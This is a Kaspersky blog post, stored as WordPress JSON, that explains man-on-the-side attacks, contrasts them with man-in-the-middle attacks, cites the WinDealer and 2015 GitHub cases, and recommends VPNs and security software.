{"id":47125,"date":"2023-02-14T06:02:16","date_gmt":"2023-02-14T11:02:16","guid":{"rendered":"https:\/\/www.kaspersky.com\/blog\/?p=47125"},"modified":"2023-03-06T08:04:15","modified_gmt":"2023-03-06T13:04:15","slug":"man-on-the-side","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/man-on-the-side\/47125\/","title":{"rendered":"Man-on-the-side \u2013 peculiar attack"},"content":{"rendered":"<p>There are attacks that everyone\u2019s heard of, like <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/ddos-distributed-denial-of-service-attack\/\" target=\"_blank\" rel=\"noopener\">distributed denial-of-service<\/a> (DDoS) attacks; there are those that mostly only professionals know about, such as <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/man-in-the-middle-attack\/\" target=\"_blank\" rel=\"noopener\">man-in-the-middle<\/a> (MitM) attacks; and then there are the rarer, more exotic ones, like <a href=\"https:\/\/encyclopedia.kaspersky.com\/glossary\/man-on-the-side-mots\/\" target=\"_blank\" rel=\"noopener\">man-on-the-side<\/a> (MotS) attacks. In this post, we talk about the latter in more detail, and discuss how they differ from man-in-the-middle attacks.<\/p>\n<h2>A who-on-the-where attack?!<\/h2>\n<p>So, how does a man-on-the-side attack work? Basically, a client sends a request to a server via a compromised data-transfer channel. This channel isn\u2019t controlled by the cybercriminals, but it is \u201clistened to\u201d by them. In most cases such an attack requires <a href=\"https:\/\/www.kaspersky.com\/blog\/windealer-man-on-the-side\/44518\/\" target=\"_blank\" rel=\"noopener nofollow\">access<\/a> to the Internet provider\u2019s hardware, and this is a very rare thing \u2013 and that\u2019s why man-on-the-side attacks are in turn rare. These types of attacks monitor the client\u2019s requests and generate their own malicious responses.<\/p>\n<p>A man-in-the-middle attack works in a similar way. The attackers also tap into the data-transfer process between the client and the server. The main difference between these two types of attacks is that the man-on-the-side client\u2019s request reaches the recipient (the server). Therefore, the goal of the attackers is to respond to the client\u2019s request faster.<\/p>\n<p>As for man-in-the-middle, the attackers has a greater level of control over the data transfer channel. They intercept the request, and can modify or delete data sent by other users on the network. Thus, they have no need to outrun the server\u2019s response.<\/p>\n<p>However, a man-in-the-middle is a much more invasive attack than a man-on-the-side one. And that means it\u2019s easier to spot. We described in more detail how a man-in-the-middle attack works, based on an example with\u2026 Little Red Riding Hood in <a href=\"https:\/\/www.kaspersky.com\/blog\/fairy-tales-red-hood\/28707\/\" target=\"_blank\" rel=\"noopener nofollow\">this post<\/a>!<\/p>\n<h2>OK, but how does a man-on-the-side attack work?<\/h2>\n<p>A successful man-on-the-side attack makes it possible to send fake responses to various types of requests to the victim\u2019s computer, and in this way to:<\/p>\n<ul>\n<li><strong>Replace a file the user wanted to download<\/strong>. In 2022, for example, APT group LuoYu <a href=\"https:\/\/www.kaspersky.com\/blog\/windealer-man-on-the-side\/44518\/\" target=\"_blank\" rel=\"noopener nofollow\">delivered<\/a> WinDealer malware to devices of victims most of whom were diplomats, scientists, or entrepreneurs in China. A request was sent to the server to <a href=\"https:\/\/securelist.com\/windealer-dealing-on-the-side\/105946\/\" target=\"_blank\" rel=\"nofollow noopener\">update<\/a> legitimate software, but the attackers managed to send their own patch version, complete with malware; <\/li>\n<li><strong>Run a malicious script on the device<\/strong>. According to the Electronic Frontier Foundation <a href=\"https:\/\/www.eff.org\/deeplinks\/2015\/04\/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack\" target=\"_blank\" rel=\"nofollow noopener\">this<\/a> is exactly how in 2015 the Chinese government tried to censor well-known open source community GitHub. The attackers used a man-on-the-side to deliver malicious JavaScript to browsers of unsuspecting users. As a result, these browsers refreshed GitHub pages over and over again. This DDoS attack lasted more than five days and significantly hampered the service;<\/li>\n<li><strong>Redirect the victim to the website<\/strong>.<\/li>\n<\/ul>\n<p>On a side note, intelligence agencies in various countries are also <a href=\"https:\/\/securityaffairs.co\/23129\/hacking\/quantumhand-nsa-impersonates-facebook-inject-malware.html\" target=\"_blank\" rel=\"nofollow noopener\">suspected<\/a> of using this type of attack.<\/p>\n<h2>Means of protection <\/h2>\n<p>We\u2019ll repeat once again that man-on-the-side attacks are quite rare. Attackers need to have access to the provider\u2019s hardware in order to carry them out. Therefore, business trips, work conferences or any other occasions when your employees connect to questionable Wi-Fi are high-risk situations. To stay safe, we recommend always working via a VPN, and using a <a href=\"https:\/\/www.kaspersky.com\/small-to-medium-business-security?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder_______\" target=\"_blank\" rel=\"noopener nofollow\">strong security solution<\/a> on all employee work devices.<\/p>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"kesb-trial\">\n","protected":false},"excerpt":{"rendered":"<p>What is a man-on-the-side attack, and how does it differ from a man-in-the-middle attack?<\/p>\n","protected":false},"author":2684,"featured_media":47110,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3051,2683],"tags":[729,4330,709,174,1866],"class_list":{"0":"post-47125","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-enterprise","9":"category-threats","10":"tag-espionage","11":"tag-man-on-the-side","12":"tag-vpn","13":"tag-wi-fi","14":"tag-wireless-networks"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/man-on-the-side\/47125\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/man-on-the-side\/25194\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/man-on-the-side\/20692\/"},{"hreflang":"en-us","url":"https:\/\/usa.kaspersky.com\/blog\/man-on-the-side\/27854\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/man-on-the-side\/25526\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/man-on-the-side\/25982\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/man-on-the-side\/28434\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/man-on-the-side\/34667\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/man-on-the-side\/20176\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/man-on-the-side\/20807\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/man-on-the-side\/29788\/"},{"hreflang":"ja","url":"https:\/\/blog.kaspersky.co.jp\/man-on-the-side\/33359\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/man-on-the-side\/25854\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/man-on-the-side\/31566\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/man-on-the-side\/31279\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/man-on-the-side\/","name":"man-on-the-side"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2684"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=47125"}],"version-history":[{"count":8,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125\/revisions"}],"predecessor-version":[{"id":47439,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/47125\/revisions\/47439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/47110"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=47125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=47125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=47125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}